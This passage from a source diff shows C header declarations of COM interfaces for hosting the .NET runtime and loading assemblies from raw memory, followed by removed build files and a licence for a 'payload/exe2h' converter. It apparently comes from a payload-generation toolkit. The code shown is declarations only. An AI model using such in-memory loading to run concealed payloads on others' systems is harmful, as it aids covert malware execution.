133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
+0
-4
payload/exe2h/Makefile less more
0 exe2h:
1 gcc -I ../../include -Wall exe2h.c -oexe2h
2 clean:
3 rm *.o exe2h
+0
-4
payload/exe2h/Makefile.mingw less more
0 exe2h:
1 x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe
2 clean:
3 rm exe2h.exe *.o
+0
-4
payload/exe2h/Makefile.msvc less more
0 exe2h:
1 cl exe2h.c mmap-windows.c
2 clean:
3 del exe2h.obj mmap-windows.obj exe2h.exe
+0
-319
payload/exe2h/exe2h.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
